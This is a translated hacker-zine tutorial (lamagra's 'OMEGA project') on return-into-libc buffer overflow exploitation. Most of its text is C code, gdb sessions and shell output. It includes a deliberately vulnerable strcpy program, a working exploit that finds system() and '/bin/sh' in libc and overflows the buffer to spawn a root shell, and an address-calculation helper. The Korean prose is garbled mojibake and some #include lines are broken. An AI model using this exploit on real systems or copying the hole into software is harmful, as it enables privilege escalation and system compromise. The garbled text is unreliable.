The OMEGA project finished +=+-+=+-+=+-+=+-+=+-+=+-+=+-+=+-+= By lamagra ---[ Flashback ÀÌÀü ±Û¿¡¼­ ³ª´Â ÀÌ°ÍÀ» ÇÏ´Â ÀÌÀ¯¿Í ¾à°£ÀÇ ¹æ¹ý¿¡ ´ëÇؼ­ ¼³¸íÇß½À´Ï´Ù. °Å±â¿¡´Â ¸î°¡Áö ¾î·Á¿òÀÌ ÀÖ¾ú½À´Ï´Ù: o system() ÀÌ È£ÃâµÉ¶§ ÀÎÀÚ¸¦ ³Ñ°ÜÁÖ´Â°Í (¿ì¸®´Â ¾²·¹±â°ªÀ» ½©·Î ¸µÅ©ÇÏ´Â ÇÁ·Î±×·¥À» »ç¿ëÇؼ­ ÀÌ°ÍÀ» ÇØ°áÇß½À´Ï´Ù.) ---[ Examination of a program flow ÇÁ·Î±×·¥ÀÇ È帧À» ¾Ë¾Æº¸±â À§ÇØ °£´ÜÇÑ ¿¹Á¦ ÇÁ·Î±×·¥À» »ç¿ëÇغ¸°Ú½À´Ï´Ù. <++> omega/example.c void foo(char *bla) { printf("I got passed %p\n",bla); } void main() { foo("fubar"); } <--> ÄÄÆÄÀÏÇÏ°í gdb ¸¦ µ¹·Áº¾´Ï´Ù. darkstar:~/omega$ gcc example.c -o example darkstar:~/omega$ gdb example GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-slackware-linux"... (gdb) disassemble main Dump of assembler code for function main: 0x8048594
: pushl %ebp 0x8048595 : movl %esp,%ebp 0x8048597 : pushl $0x8049099 0x804859c : call 0x804857c 0x80485a1 : addl $0x4,%esp 0x80485a4 : movl %ebp,%esp 0x80485a6 : popl %ebp 0x80485a7 : ret End of assembler dump. (gdb) x/5bc 0x8049099 0x8049099 <_fini+25>: 102 'f' 117 'u' 98 'b' 97 'a' 114 'r' (gdb) disassemble foo Dump of assembler code for function foo: 0x804857c : pushl %ebp 0x804857d : movl %esp,%ebp 0x804857f : movl 0x8(%ebp),%eax 0x8048582 : pushl %eax 0x8048583 : pushl $0x8049088 0x8048588 : call 0x8048400 0x804858d : addl $0x8,%esp 0x8048590 : movl %ebp,%esp 0x8048592 : popl %ebp 0x8048593 : ret End of assembler dump. (gdb) quit darkstar:~/omega$ 0x8048597 ¿¡¼­ "fubar" ½ºÆ®¸µÀÇ ÁÖ¼Ò°ªÀÌ ½ºÅÿ¡ push µÈ´Ù´Â°ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù. ±×ÈÄ¿¡ foo ÇÔ¼ö°¡ È£Ãâ(0x804859c). µË´Ï´Ù. ±×¸®°í push µÈ ÁÖ¼Ò°ªÀ» eax ·¹Áö½ºÅÍ·Î Àоî¿ÈÀ¸·Î¼­ foo() ¸¦ ÃʱâÈ­ÇÕ´Ï´Ù. 0x804857f À» º¸¸é ¾Ë ¼ö ÀÖÁÒ. ±× ÁÖ¼Ò°ªÀº 0x8(%ebp) ¿¡ À§Ä¡ÇØ ÀÖ½À´Ï´Ù. ebp ´Â ÇöÀçÀÇ ½ºÅà Æ÷ÀÎÅÍÀÔ´Ï´Ù. ---[ Implementation ±×·³ ÀÌÀüÀ¸·Î µ¹¾Æ°¡¼­.. °£´ÜÇÑ Å×½ºÆ® ÇÁ·Î±×·¥À» ¸¸µé¾ú½À´Ï´Ù. <++> omega/test.c /* * A small test program for project "omega" * Lamagra */ foo(char *bla) { printf("foo: %p\n",bla); printf("foo: %s \n",bla); } main() { char bla[8]; char *shell = "/bin/sh"; long addy = 0x41414141; printf("foo = 0x%x\n",(long)&foo); printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addy; /* buffer */ *(long *)&bla[4] = addy; /* buffer */ *(long *)&bla[8] = addy; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ *(long *)&bla[16] = addy; /* Junk */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> ÄÚ¸àÆ®¸¦ º¸¸é ±× ¿ëµµ¸¦ È®½ÇÇÏ°Ô ¾Ë¼ö ÀÖ½À´Ï´Ù. Àо¼¼¿ä. ±×¸®°í ÄÄÆÄÀÏÇÏ°í ½ÇÇàÇØ º¾´Ï´Ù. darkstar:~/omega$ gcc test.c -otest darkstar:~/omega$ test foo = 0x804857c bla = 0xbffffb08 shell = 0x8049111 foo: 0x8049111 foo: /bin/sh segmentation fault darkstar:~/omega$ foo ÇÔ¼ö°¡ È£ÃâµÇ¾ú°í ÀÎÀÚ(argument) °¡ Á¤È®ÇÏ°Ô µé¾î°¬½À´Ï´Ù. ±×·¯³ª ½ÇÇàÈÄ¿¡ segmentation fault ¿¡·¯°¡ ¹ß»ýÇÕ´Ï´Ù. µð¹ö±×Çؼ­ ±× ÀÌÀ¯¸¦ ¾Ë¾Æº¾½Ã´Ù. darkstar:~/omega$ gdb test GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-slackware-linux"... (gdb) break *foo Breakpoint 1 at 0x804857c (gdb) run Starting program: /tmp/omega/hello foo = 0x804857c bla = 0xbffffb10 shell = 0x8049111 Breakpoint 1, 0x804857c in foo () (gdb) x/10wx 0xbffffb10 0xbffffb10: 0x41414141 0x41414141 0x41414141 0x0804857c 0xbffffb20: 0x41414141 0x08049111 0xbffffb44 0x00000000 0xbffffb30: 0x00000000 0x00000000 (gdb) c Continuing. foo: 0x8049111 foo: /bin/sh Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg ebp ebp 0x41414141 0x41414141 (gdb) info reg esp esp 0xbffffb24 0xbffffb24 (gdb) quit The program is running. Exit anyway? (y or n) y darkstar:~/omega$ ¸ÛûÇÑ ¹öÆÛ "bla" ´Â ¿ì¸®ÀÇ Àǵµ¸¦ ¸í¹éÇÏ°Ô º¸¿©ÁÝ´Ï´Ù. ÇÁ·Î±×·¥ÀÌ 0xbffffb20 ¹øÁö¸¦ º¸¼¼¿ä. 0x41414141 ¹øÁö¸¦ ½ÇÇàÇÏ·Á°í ½ÃµµÇ߱⶧¹®¿¡ segfault °¡ ¹ß»ýÇÑ°Ì´Ï´Ù. foo() °¡ º¹±Í(¸®ÅÏ)ÇÒ¶§ ½ºÅÿ¡¼­(esp °¡ °¡¸®Å°´Â ºÎºÐ) ebp ¿Í eip °¡ pop µË´Ï´Ù. segfault °¡ ³ªÁö ¾Êµµ·Ï ÇÏ·Á¸é ±×°÷¿¡ ´Ù¸¥ ÁÖ¼Ò°ª(exit() ¶óµçÁö..)À» ³ÖÀ¸¸é µÇ°ÚÁÒ. ±×·¯¸é ±ò²ûÇÏ°Ô Á¾·á°¡ µÉ°Ì´Ï´Ù. ÀÌ ÆÐÄ¡¸¦ Àû¿ëÇؼ­ ÇØ°áÇսô٠(patch test.c test.patch) <++> omega/test.patch --- old.c Wed Oct 6 18:49:07 1999 +++ test.c Wed Oct 6 18:49:25 1999 @@ -19,6 +19,6 @@ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ - *(long *)&bla[16] = addr; /* Junk */ + *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> ÀÎÀÚ(argument) ¸¦ ¿©·¯°³ »ç¿ëÇؼ­Çصµ µÇ°ÚÁÒ. 0x8(%ebp) = arg[1] 0xc(%ebp) = arg[2] 0x10(%ebp) = arg[3] µîµî.. <++> omega/multiple.c #include #include main() { char bla[8]; char *shell = "/bin/sh"; long addr = 0x41414141; printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addr; /* buffer */ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &execl; /* saved eip */ *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* arg[1] */ *(long *)&bla[24] = shell; /* arg[2] */ *(long *)&bla[28] = 0x0; /* arg[3] */ /* * Executes execl("/bin/sh","/bin/sh",0x0); * On error exit("/bin/sh"); i know weird */ */ } <--> ÀÚ ÀÌÁ¦ secure ÇÑ È¯°æ¿¡¼­ ¹öÆÛ¿À¹öÇ÷οì exploit ¸¦ ÇÒ ¼ö ÀÖ½À´Ï´Ù. ÈïºÐ µÅÁ®? <++> omega/hole.c /* * The hole program. * Prints the address of system() in libc and overflows. */ #include #include main(int argc, char **argv) { char buf[8]; long addr; void *handle; handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(argc > 1) strcpy(buf, argv[1]); } <--> <++> omega/exploit.c /* * The exploit * Finds the address of system() in libc. * Searches for "/bin/sh" in the neighbourhood of system(). * (System() uses that string) * Lamagra */ #include #include main(int argc, char **argv) { int x,size; char *buf; long addr,shell,exitaddy; void *handle; if(argc != 3){ printf("Usage %s \n",argv[0]); exit(-1); } size = atoi(argv[1])+16; if((buf = malloc(size)) == NULL){ perror("can't allocate memory"); exit(-1); } handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { printf("system() contains a '0', sorry!"); exit(-1); } shell = addr; while(memcmp((void*)shell,"/bin/sh",8)) shell++; printf("\"/bin/sh\" is at 0x%x\n",shell); printf("print %s\n",shell); memset(buf,0x41,size); *(long *)&buf[size-16] = 0xbffffbbc; *(long *)&buf[size-12] = addr; *(long *)&buf[size-4] = shell; puts("Executing"); execl(argv[2],argv[2],buf,0x0); } <--> darkstar:~/omega$ gcc hole.c -ohole -ldl darkstar:~/omega$ gcc omega.c -oomega -ldl darkstar:~/omega$ omega 8 vun System() is at 0x40043a18 "/bin/sh" is at 0x40089d26 print /bin/sh Executing System() is at 0x40043a18 bash# Àç´ë·Î µ¿ÀÛÇÏ´Â°Í °°³×¿ä. ±×·¯³ª À̹æ¹ýÀ» À§Çؼ­´Â ÇÊ¿äÇÑ ¶óÀ̺귯¸®°¡ ¸µÅ©µÇ¾î ÀÖ¾î¾ß¸¸ ÇÕ´Ï´Ù. ÇÁ·Î±×·¥ÀÌ µ¿ÀÛÇÏÁö ¾Ê´Â´Ù¸é ·¯À̺귯¸®°¡ ¸µÅ©µÇ¾îÀÖÁö ¾Ê±â ¶§¹®ÀÔ´Ï´Ù. system() ÀÇ ÁÖ¼Ò°¡ ´Ù¸£±â ¶§¹®ÀÌÁÒ. - Á¤È®ÇÑ ÁÖ¼Ò¸¦ ã´Â ´Ù¸¥ ¹æ¹ýµéÀÔ´Ï´Ù. o ÁÖ¼Ò¸¦ Ãâ·ÂÇϵµ·Ï ÇÁ·Î±×·¥À» º¯°æÇÑ´Ù. (¾Æ¸¶µµ °°À» °Ì´Ï´Ù.) o ELF-header ·ÎºÎÅÍ ÁÖ¼Ò¸¦ ¾ò´Â´Ù. (¼Õ»óµÈ ÆÄÀÏ¿¡¼­´Â Á¦´ë·Î µÇÁö ¾ÊÀ¸¸® ¶ó°í »ý°¢ÇÕ´Ï´Ù. ÇØ°áÃ¥Àº ÀçÄÄÆÄÀÏ) o atexit() (Ç×»ó °¡´É) ÀÇ ÁÖ¼Ò¸¦ ¾ò¾î¼­ system() ÀÇ ÁÖ¼Ò¸¦ °è»êÇÑ´Ù. ---[ Extra <++> omega/calc.c #include #include main(int argc, char **argv) { long addy,diff; if (argc != 2) { printf("Usage: %s \n",argv[0]); printf("Get the address with GDB\n\t$ echo x atexit|gdb program\n"); exit(-1); } addy = strtoul(argv[1],0,0); printf("Input = 0x%x\n",addy); diff = (long)&atexit - (long)&system; printf("system() = 0x%x\n",addy - diff + 16); } <--> ---[ Reference corezine #2 (http://bounce.to/unah16) ¿¡ ÀÖ´Â ³ªÀÇ ÀÌÀü±Û ---[EOF --------------------------------------------------------------------- - ¿¹Á¦ Áß½ÉÀÇ ±ÛÀ̶ó ¹ø¿ªÀ̶ó°í Çϱ⵵ ±×·¯³×¿ä. ÀÌÇØ°¡ ¾ÈµÇ´Â ºÎºÐÀº ¾ðÁ¦³ª ó·³ ¿ø¹®À» Âü°í~ °íÄ¥ºÎºÐÀÌ ÀÖÀ¸¸é ¸áÁÖ¼¼¿ä. ¾Æ·¡¿¡ ¿ø¹®À» ÷ºÎÇÕ´Ï´Ù. - a0 --+ ---------------------------------------------------------------------